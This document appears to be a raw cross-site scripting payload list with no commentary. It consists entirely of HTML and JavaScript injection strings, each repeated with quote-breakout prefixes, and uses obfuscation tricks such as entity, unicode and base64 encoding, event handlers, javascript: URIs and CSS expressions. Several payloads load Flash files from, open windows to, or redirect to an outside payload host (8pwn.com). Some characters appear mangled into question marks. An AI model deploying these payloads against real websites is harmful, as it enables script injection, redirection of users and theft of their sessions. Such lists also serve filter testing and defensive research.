'><SCRIPT> alert(\"1\")</SCRIPT>
</ScrIpt><SCRIPT> alert(\"1\")</SCRIPT>
<script>alert([!![]] [])</script>
</ScrIpt><script>alert([!![]] [])</script>
"><script>alert([!![]] [])</script>
</ScrIpt><script>alert([!![]] [])</script>
'><script>alert([!![]] [])</script>
</ScrIpt><script>alert([!![]] [])</script>
<var onmouseover="prompt(1)">X</var>
"><var onmouseover="prompt(1)">X</var>
'><var onmouseover="prompt(1)">X</var>
%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80?
<input type="text" value=``<div/onmouseover='alert(1)'>X</div>
"><input type="text" value=``<div/onmouseover='alert(1)'>X</div>
'><input type="text" value=``<div/onmouseover='alert(1)'>X</div>
<iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
"><iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
'><iframe  src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> ?
<iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
"><iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
'><iframe  src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?
"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?
'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
"><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>
'><meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/>?
<embed code="http://8pwn.com/xss_serve_payloads/flash.swf" allowscriptaccess=always>
"><embed code="http://8pwn.com/xss_serve_payloads/flash.swf" allowscriptaccess=always>
'><embed code="http://8pwn.com/xss_serve_payloads/flash.swf" allowscriptaccess=always>?
"><embed code="http://8pwn.com/xss_serve_payloads/flash.swf" allowscriptaccess=always>?
'><embed code="http://8pwn.com/xss_serve_payloads/flash.swf" allowscriptaccess=always>?
<script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</ScrIpt><script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
"><script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</ScrIpt><script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
'><script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</ScrIpt><script>~'\u0061' ;  \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073.  \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
"><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
'><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script ????????????
"><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
"><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
'><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script ????????????
'><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
"><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script
'><script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/X/)></script ????????????
<script itworksinallbrowsers>/*<script* */alert(1)</script
"><script itworksinallbrowsers>/*<script* */alert(1)</script
'><script itworksinallbrowsers>/*<script* */alert(1)</script ?
"><script itworksinallbrowsers>/*<script* */alert(1)</script ?
'><script itworksinallbrowsers>/*<script* */alert(1)</script ?
<img src ?itworksonchrome?\/onerror = alert(1)
"><img src ?itworksonchrome?\/onerror = alert(1)
'><img src ?itworksonchrome?\/onerror = alert(1)???
"><img src ?itworksonchrome?\/onerror = alert(1)???
'><img src ?itworksonchrome?\/onerror = alert(1)???
<meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
"><meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
'><meta http-equiv="refresh" content="0; url=data:text/html;blabla,&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
"><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
'><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa  aaaaaaaaa aaaaaaaaaa  href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe
<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
"><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script>
'><script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> ?
<div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(1)" onclick="alert(1)">x</button>?
"><div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(1)" onclick="alert(1)">x</button>?
'><div  style="position:absolute;top:0;left:0;width:100%;height:100%"  onmouseover="prompt(1)" onclick="alert(1)">x</button>?
<img src=x onerror=window.open('http://8pwn.com/xss_serve_payloads/X.html"');>
"><img src=x onerror=window.open('http://8pwn.com/xss_serve_payloads/X.html"');>
'><img src=x onerror=window.open('http://8pwn.com/xss_serve_payloads/X.html"');>
<table background=javascript:alert(1)></table>
"><table background=javascript:alert(1)></table>
'><table background=javascript:alert(1)></table>
<object/data=//8pwn.com/xss_serve_payloads/flash.swf
"><object/data=//8pwn.com/xss_serve_payloads/flash.swf
'><object/data=//8pwn.com/xss_serve_payloads/flash.swf
<applet code="javascript:confirm(1);">
"><applet code="javascript:confirm(1);">
'><applet code="javascript:confirm(1);">
<marquee/onstart=confirm(2)>/
"><marquee/onstart=confirm(2)>/
'><marquee/onstart=confirm(2)>/
<body onload=prompt(1);>
"><body onload=prompt(1);>
'><body onload=prompt(1);>
<select autofocus onfocus=alert(1)>
"><select autofocus onfocus=alert(1)>
'><select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
"><textarea autofocus onfocus=alert(1)>
'><textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
"><keygen autofocus onfocus=alert(1)>
'><keygen autofocus onfocus=alert(1)>
<video><source onerror="javascript:alert(1)">
"><video><source onerror="javascript:alert(1)">
'><video><source onerror="javascript:alert(1)">
<a onmouseover="javascript:window.onerror=alert;throw 1>
"><a onmouseover="javascript:window.onerror=alert;throw 1>
'><a onmouseover="javascript:window.onerror=alert;throw 1>
<img src=x onerror="javascript:window.onerror=alert;throw 1">
"><img src=x onerror="javascript:window.onerror=alert;throw 1">
'><img src=x onerror="javascript:window.onerror=alert;throw 1">
<body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
"><body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
'><body/onload=javascript:window.onerror=eval;throw'=alert\x281\x29';
<img style="xss:expression(alert(1))">
"><img style="xss:expression(alert(1))">
'><img style="xss:expression(alert(1))">
<div style="color:rgb(''&#0;x:expression(alert(1))"></div>
"><div style="color:rgb(''&#0;x:expression(alert(1))"></div>
'><div style="color:rgb(''&#0;x:expression(alert(1))"></div>
<a onmouseover=location=?javascript:alert(1)>click
"><a onmouseover=location=?javascript:alert(1)>click
'><a onmouseover=location=?javascript:alert(1)>click
<body onfocus="location='javascrpt:alert(1) >123
"><body onfocus="location='javascrpt:alert(1) >123
'><body onfocus="location='javascrpt:alert(1) >123
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
"><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
'><svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values=";javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/>
<svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>
"><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>
'><svg><![CDATA[><imagexlink:href="]]><img/src=xx:xonerror=alert(1)//"></svg>
<meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
"><meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
'><meta content="&NewLine; 1 &NewLine;;JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/>
<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:\u0061lert(1);"></g></svg>
<style>#test{x:expression(alert(/X/))}</style>
"><style>#test{x:expression(alert(/X/))}</style>
'><style>#test{x:expression(alert(/X/))}</style>
<object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>
'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?
"><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?
'><object data=data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==></object>?
<meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
"><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
'><meta http-equiv="refresh" content="0; url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E">
eval("s=document.createElement('script');alert(1);document.getElementsByTagName('head')[0].appendChild(s)")
<meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html"
"><meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html"
'><meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html"
<meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html"
"><meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html"
'><meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html">
"><meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html">
'><meta http-equiv="refresh" content="0;url=http://8pwn.com/xss_serve_payloads/X.html">
javascript:/*?></marquee></script></title></textarea></noscript></style></xmp>?> [img=1]<img -/style=-=expression&#40/*?/-/*',/**/eval(name)//);wi dth:100%;height:100%;position:absolute;behavior:url(#default#VML);-o-link:javascript :eval(title);-o-link-source:current name=alert(1) onerror=eval(name) src=1 autofocus onfocus=eval(name) onclick=eval(name) onmouseover=eval(name) background=javascript:eval(name)//>?"/>
<img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>
"><img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>
'><img src=?<img src=x?/onerror=alert(1)//?> Jquery: <img/src/onerror=alert(1)>
<input id=x><input id=x><script>alert(x)</script>
"><input id=x><input id=x><script>alert(x)</script>
'><input id=x><input id=x><script>alert(x)</script>
<a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>
"><a href="invalid:1" id=x name=y>test</a><a href="invalid:2" id=x name=y>test</a><script>alert(x.y[0])</script>
